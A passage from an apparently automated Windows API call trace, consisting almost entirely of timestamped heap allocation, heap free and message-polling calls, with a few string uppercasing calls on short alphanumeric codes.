RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0255.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0255.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.985] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.985] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.985] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0255.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.986] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.986] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0255.986] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0255.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0255.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.987] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.987] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0255.987] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0255.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.988] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.988] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0255.988] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.989] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.989] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.989] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0255.989] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.989] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.990] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.990] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.990] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.990] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.991] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0255.991] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0255.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0255.991] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.991] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.991] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.992] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.992] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.992] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0255.992] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.992] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.993] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.993] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.994] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.994] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0255.994] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0255.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.994] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0255.994] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.994] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0255.995] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.995] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.995] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0255.995] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.995] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0255.996] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.996] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.997] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.997] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0255.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.997] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0255.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.997] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0255.997] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 